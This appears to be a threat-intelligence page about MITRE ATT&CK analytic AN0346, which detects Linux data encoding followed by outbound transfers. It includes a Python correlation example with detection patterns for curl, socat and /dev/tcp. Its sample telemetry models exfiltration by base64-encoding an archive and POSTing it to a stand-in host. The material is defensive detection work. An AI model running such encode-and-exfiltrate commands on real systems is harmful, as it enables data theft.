AN0346: Analytic 0346
Shell/utility (base64, xxd -p, od, openssl enc -base64, python/perl base64 libraries) encodes data → subsequent outbound connections (curl/wget/bash TCP, socat, python requests) with high asymmetry or Base64/MIME blobs in HTTP/DNS payloads.
Analyst context for executives and security teams
This analytic matters because it focuses on a common data-handling pattern on Linux systems: local encoding of data followed by outbound network activity that may carry encoded blobs. For leaders, the value is not in the specific utilities alone, but in validating whether the organization can connect host activity to network egress evidence quickly enough to support incident decisions involving possible data movement or suspicious command-line automation.
Executive priority
Prioritize this as a coverage-validation item for Linux server and workload monitoring, especially where outbound internet access is allowed. Security leaders should ask whether SOC and IR teams can correlate command execution with HTTP or DNS egress, whether egress logging is retained long enough for investigations, and whether exceptions for administrative automation are documented as audit evidence. The supplied ATT&CK object does not specify impact, attribution, or active exploitation, so the business decision is about readiness and visibility rather than confirmed threat prevalence.
Technical view
For SOC and detection teams, validate whether Linux telemetry can show use of shell or utility-based encoding tools such as base64, xxd -p, od, openssl enc -base64, or Python/Perl base64 libraries, and whether those events can be correlated with subsequent outbound connections from tools or runtimes such as curl, wget, bash TCP, socat, or python requests. Since the official detection field is not provided and no tactics are specified, treat AN0346 as an analytic concept requiring local implementation, tuning, and baselining rather than a complete detection rule.
Likely telemetry
- Linux process execution telemetry with command-line arguments
- Parent-child process relationships for shells, scripting runtimes, and network utilities
- Outbound network connection metadata from Linux hosts
- HTTP request metadata or payload indicators where legally and technically available
- DNS query and response logs, including unusually long or encoded-looking labels where available
Detection direction
- Correlate encoding-related process activity with outbound connections occurring shortly afterward from the same host or process lineage.
- Look for high asymmetry in outbound traffic or Base64/MIME-like blobs in HTTP or DNS payloads, while accounting for legitimate software packaging, backup, monitoring, CI/CD, and administrative scripts.
- Tune around known-good automation that uses base64, openssl, curl, wget, Python, or Perl, because these utilities are common on Linux and can create false positives when viewed in isolation.
- Validate that telemetry preserves command-line detail and process lineage; without it, this analytic may degrade into weak network-only pattern matching.
- Confirm whether DNS and HTTP inspection are available and appropriate in the environment; encrypted traffic, privacy controls, or limited payload logging may create blind spots.
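As an added illustration of the correlation logic above (not code from MITRE or from Glexia's page), the Python below joins encoder executions to later egress events from the same host and parent process and flags Base64/MIME-like runs in the payload; the event schema, the regex patterns, the 40-character blob threshold and the sample telemetry are all constructed assumptions to be tuned against local baselines.

```python
import base64
import re
from collections import defaultdict

# Command-line shapes of the encoding utilities AN0346 names (constructed patterns, tune locally).
ENCODER_PATTERNS = [
    re.compile(r"(^|/)base64(\s|$)"),
    re.compile(r"(^|/)xxd\b.*\s-p\b"),
    re.compile(r"(^|/)od(\s|$)"),
    re.compile(r"(^|/)openssl\s+enc\b.*-base64"),
    re.compile(r"(^|/)(python3?|perl)\b.*\bbase64\b"),
]
# Egress tools AN0346 names; bash TCP redirection shows up as /dev/tcp/ in the command line.
EGRESS_RE = re.compile(r"(^|/)(curl|wget|socat)\b|/dev/tcp/|(^|/)python3?\b.*\brequests\b")
BLOB_RE = re.compile(r"[A-Za-z0-9+/=]{40,}")  # Base64/MIME-like run; 40 is an assumed threshold

def is_encoder(cmd):
    return any(p.search(cmd) for p in ENCODER_PATTERNS)

def has_blob(payload):
    """True when an HTTP body or DNS label carries a Base64/MIME-like run (heuristic, not proof)."""
    return bool(payload) and BLOB_RE.search(payload) is not None

def correlate(events, window_s=60):
    """Join encoder executions to later egress from the same host and parent process (the shell
    or script that ran both). Event keys: ts (seconds), host, type ('proc'|'net'), pid, ppid, cmd."""
    encoders = defaultdict(list)        # (host, ppid) -> encoder events seen so far
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["host"], ev["ppid"])
        if ev["type"] == "proc" and is_encoder(ev["cmd"]):
            encoders[key].append(ev)
        elif ev["type"] == "net" and EGRESS_RE.search(ev["cmd"]):
            for enc in encoders.get(key, []):
                if 0 <= ev["ts"] - enc["ts"] <= window_s:
                    alerts.append({"host": ev["host"], "encoder": enc["cmd"], "egress": ev["cmd"],
                                   "dest": ev.get("dest"), "blob": has_blob(ev.get("payload", ""))})
    return alerts

# Constructed telemetry (not from any real host): one suspicious sequence, one CI job decoding a token.
SAMPLE_BLOB = base64.b64encode(b"constructed sample content for the detection test " * 2).decode()
SAMPLE_EVENTS = [
    {"ts": 100, "host": "web01", "type": "proc", "pid": 4001, "ppid": 3990, "cmd": "base64 -w0 /var/tmp/report.tgz"},
    {"ts": 130, "host": "web01", "type": "net", "pid": 4002, "ppid": 3990, "dest": "203.0.113.10:80",
     "cmd": "curl -X POST -d @/tmp/out.txt http://203.0.113.10/up", "payload": SAMPLE_BLOB},
    {"ts": 200, "host": "ci01", "type": "proc", "pid": 5100, "ppid": 5000, "cmd": "base64 -d token.b64"},
    {"ts": 900, "host": "ci01", "type": "net", "pid": 5101, "ppid": 5000, "dest": "registry.example:443",
     "cmd": "curl https://registry.example/v2/", "payload": ""},
]
```

With the default 60-second window only the web01 sequence alerts; widening the window to 1000 seconds also surfaces the CI host's benign decode-then-pull, which is the kind of known-good automation the tuning bullets above say to baseline.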
Mitigation priorities
- Start by restricting unnecessary outbound access from Linux servers and workloads through egress controls and approved proxies.
- Harden and monitor administrative scripting paths so legitimate use of encoding and network utilities is documented and distinguishable from unusual behavior.
- Ensure endpoint logging, network egress logging, and retention policies support correlation during incident response.
- Apply least privilege and workload segmentation so a compromised Linux host has limited ability to stage or transmit data externally.
- Use baselining and change control to reduce alert noise from expected automation before escalating this analytic into high-severity SOC workflows.
Analyst notes and limits
AN0346 is a MITRE detection analytic for Linux describing a sequence of local encoding activity followed by outbound connections or encoded-looking HTTP/DNS content. No ATT&CK relationships, tactics, or official detection implementation were supplied, so the strongest use is as a defensive engineering prompt: test whether host and network telemetry can be joined into an investigation-ready signal.
This take uses only the supplied ATT&CK fields. It does not establish active exploitation, adversary attribution, affected software, impact, or guaranteed detection. Local baselines, logging architecture, legal constraints on payload inspection, and approved administrative workflows are required to determine alert quality and operational priority.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | a5e90820e267… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] mitre-attack: AN0346
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.